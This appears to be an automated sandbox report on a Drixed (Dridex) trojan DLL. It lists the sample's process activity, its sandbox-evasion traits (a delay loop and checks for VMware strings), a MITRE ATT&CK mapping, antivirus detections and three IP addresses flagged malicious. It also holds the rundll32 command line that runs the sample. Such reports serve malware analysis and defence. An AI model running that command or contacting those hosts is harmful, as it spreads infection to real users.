Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: rpidebbfll.pdb source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll
Source:	Binary string: wntdll.pdbUGP source: rundll32.exe, 00000003.00000003.452788302.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000009.00000003.690183508.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: rundll32.exe, 00000003.00000003.452788302.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000009.00000003.690183508.000000004B280000.00000004.00000001.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6F02F6CC push esi; mov dword ptr [esp], 00000000h

3_2_6F02F6CD

Source: C:\Windows\SysWOW64\WerFault.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Section loaded: OutputDebugStringW count: 1224

Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 805			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 419			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6F030754 GetTokenInformation,GetSystemInfo,GetTokenInformation,

3_2_6F030754

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: Amcache.hve.21.dr	Binary or memory string: VMware
Source: Amcache.hve.21.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.21.dr	Binary or memory string: VMware-42 35 34 13 2a 07 0a 9c-ee 7f dd c3 60 c7 b9 af
Source: Amcache.hve.21.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.21.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.21.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.21.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.21.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.21.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.21.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.21.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.21.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.21.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.21.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1x
Source: Amcache.hve.21.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.21.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.21.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6F026D50 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

3_2_6F026D50

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 664

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6F033110 RtlAddVectoredExceptionHandler,

3_2_6F033110

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 664	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 664	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7112 -s 664	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 664	Jump to behavior

Source: loaddll32.exe, 00000000.00000000.518575050.00000000012C0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.468304481.0000000002B00000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.872679055.00000000030A0000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.872585364.0000000002D50000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000000.686591592.0000000002FE0000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000000.720244416.0000000002FF0000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000000.697340415.00000000031E0000.00000002.00020000.sdmp, rundll32.exe, 0000000D.00000000.718748745.0000000002B50000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000000.518575050.00000000012C0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.468304481.0000000002B00000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.872679055.00000000030A0000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.872585364.0000000002D50000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000000.686591592.0000000002FE0000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000000.720244416.0000000002FF0000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000000.697340415.00000000031E0000.00000002.00020000.sdmp, rundll32.exe, 0000000D.00000000.718748745.0000000002B50000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000000.518575050.00000000012C0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.468304481.0000000002B00000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.872679055.00000000030A0000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.872585364.0000000002D50000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000000.686591592.0000000002FE0000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000000.720244416.0000000002FF0000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000000.697340415.00000000031E0000.00000002.00020000.sdmp, rundll32.exe, 0000000D.00000000.718748745.0000000002B50000.00000002.00020000.sdmp	Binary or memory string: &Program Manager
Source: loaddll32.exe, 00000000.00000000.518575050.00000000012C0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.468304481.0000000002B00000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.872679055.00000000030A0000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.872585364.0000000002D50000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000000.686591592.0000000002FE0000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000000.720244416.0000000002FF0000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000000.697340415.00000000031E0000.00000002.00020000.sdmp, rundll32.exe, 0000000D.00000000.718748745.0000000002B50000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

3_2_6F026D50

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

3_2_6F026D50

Source: Amcache.hve.21.dr

Binary or memory string: c:\program files\windows defender\msmpeng.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Disable or Modify Tools1	OS Credential Dumping	Query Registry1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion11	LSASS Memory	Security Software Discovery21	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Virtualization/Sandbox Evasion11	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Rundll321	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	Account Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Owner/User Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Information Discovery13	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	21%	Virustotal		Browse
SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	32%	ReversingLabs	Win32.Trojan.Drixed
SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.2.rundll32.exe.2ba4756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
12.0.rundll32.exe.2bd0000.3.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
10.2.rundll32.exe.44c4756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
11.0.rundll32.exe.2bf4756.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
10.2.rundll32.exe.6f020000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
2.0.rundll32.exe.3fe4756.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
10.0.rundll32.exe.2a00000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
11.0.rundll32.exe.6f020000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
3.2.rundll32.exe.27b0000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
10.0.rundll32.exe.6f020000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
12.2.rundll32.exe.2bd0000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
13.0.rundll32.exe.6f020000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
13.0.rundll32.exe.2580000.3.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
12.0.rundll32.exe.2dd4756.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
10.0.rundll32.exe.6f020000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
2.0.rundll32.exe.3fe4756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
2.0.rundll32.exe.6f020000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
13.0.rundll32.exe.2580000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
13.2.rundll32.exe.6f020000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
11.2.rundll32.exe.2bf4756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
12.2.rundll32.exe.6f020000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
11.0.rundll32.exe.2bf4756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
10.0.rundll32.exe.44c4756.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
13.0.rundll32.exe.4034756.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
12.0.rundll32.exe.6f020000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
11.0.rundll32.exe.28e0000.3.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
3.2.rundll32.exe.6f020000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
0.0.loaddll32.exe.5b0000.3.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
12.2.rundll32.exe.2dd4756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
13.0.rundll32.exe.6f020000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
0.0.loaddll32.exe.5b0000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
13.0.rundll32.exe.4034756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
12.0.rundll32.exe.2dd4756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
2.0.rundll32.exe.2580000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
0.0.loaddll32.exe.e04756.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
11.0.rundll32.exe.28e0000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
0.0.loaddll32.exe.6f020000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
11.0.rundll32.exe.6f020000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
10.2.rundll32.exe.2a00000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
11.2.rundll32.exe.28e0000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
13.2.rundll32.exe.4034756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
10.0.rundll32.exe.44c4756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.0.loaddll32.exe.e04756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
2.0.rundll32.exe.2580000.3.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
10.0.rundll32.exe.2a00000.3.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
9.2.rundll32.exe.2894756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
12.0.rundll32.exe.2bd0000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
12.0.rundll32.exe.6f020000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
9.2.rundll32.exe.2790000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
11.2.rundll32.exe.6f020000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
13.2.rundll32.exe.2580000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
9.2.rundll32.exe.6f020000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.vomfass.deDVarFileInfo$	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.21.dr	false		high
http://www.vomfass.deDVarFileInfo$	loaddll32.exe, 00000000.00000000.523818743.000000006F03F000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.475656275.000000006F03F000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.873978106.000000006F03F000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.874891443.000000006F03F000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.758338318.000000006F03F000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000000.723066869.000000006F03F000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000000.712126341.000000006F03F000.00000002.00020000.sdmp, rundll32.exe, 0000000D.00000002.765202970.000000006F03F000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
66.147.235.11	unknown	United States	23535	HOSTROCKETUS	true
149.202.179.100	unknown	France	16276	OVHFR	true
81.0.236.89	unknown	Czech Republic	15685	CASABLANCA-ASInternetCollocationProviderCZ	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	510686
Start date:	28.10.2021
Start time:	04:49:29
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
